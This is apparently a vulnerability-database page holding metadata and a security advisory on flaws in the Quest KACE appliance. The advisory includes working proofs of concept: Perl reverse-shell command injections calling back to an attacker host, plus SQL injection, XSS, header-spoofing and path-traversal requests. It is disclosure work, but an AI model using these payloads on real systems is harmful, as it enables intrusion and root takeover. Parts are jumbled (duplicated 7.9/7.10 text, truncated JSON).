"url": "https://github.com/lean0x2f/lean0x2f.github.io "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.590000",
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE Systems Management Appliance Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
],
"trust": 0.6
}
}
VAR-201805-0597
Vulnerability from variot - Updated: 2023-12-18 12:01The 'checksum' parameter of the '/common/download_attachment.php' script in the Quest KACE System Management Appliance 8.0.318 can be abused to read arbitrary files with 'www' privileges via Directory Traversal. No administrator privileges are needed to execute this script. Quest KACE Systems Management Appliance Contains a path traversal vulnerability.Information may be obtained. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A path traversal vulnerability exists in the QuestKACESystemManagementAppliance 8.0.318 release. Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. The following proof of concept reads the '/etc/passwd' file.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0597",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
